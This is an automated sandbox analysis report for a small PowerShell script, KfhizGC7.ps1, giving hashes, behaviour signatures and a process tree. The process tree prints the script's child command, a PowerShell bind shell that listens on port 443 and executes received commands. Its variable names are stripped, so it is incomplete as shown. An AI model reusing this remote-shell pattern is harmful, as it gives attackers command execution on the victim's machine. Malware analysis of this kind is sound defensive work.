Overview

overview

1

Static

static

KfhizGC7.ps1

windows7_x64

1

KfhizGC7.ps1

windows10_x64

1

Analysis

  • max time kernel
    136s
  • max time network
    50s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    07-07-2020 09:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    KfhizGC7.ps1

  • Size

    594B

  • MD5

    5f3a4a7943f554bd8f39a48cc9b2faa9

  • SHA1

    fb28d0ac2f50899a7170029120027db996b488fd

  • SHA256

    5f5c5f00a84e03684b736c76b1294a9825966ace8f628e7e65dffba8d6bdc7e6

  • SHA512

    737e27f3ea569ccc893ebdc0b7a8c64409f1228d4266ce8371130432b50c42f7c687cc191a94c1dd94949e951dffa9d6c23ba910d5b0e88b25eb58c1c37cfdf7

Score
1/10

Malware Config

Signatures

  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\KfhizGC7.ps1
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1768
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c " = New-Object System.Net.Sockets.TcpListener( '0.0.0.0',443);.start(); = .AcceptTcpClient(); = nt.GetStream();[byte[]] = 0..65535|%{0};while(( = .Read(, 0, es.Length)) -ne 0){; = (New-Object -TypeName System.Text.ASCIIEncoding).GetString (,0, ); = (iex 2>&1 | Out-String ); = + 'PS ' + (pwd).Path + '> '; = ([text.encoding]::ASCII).GetBytes(); eam.Write(,0,.Length);.Flush()};.Close();.Sto p()"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      PID:3152

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads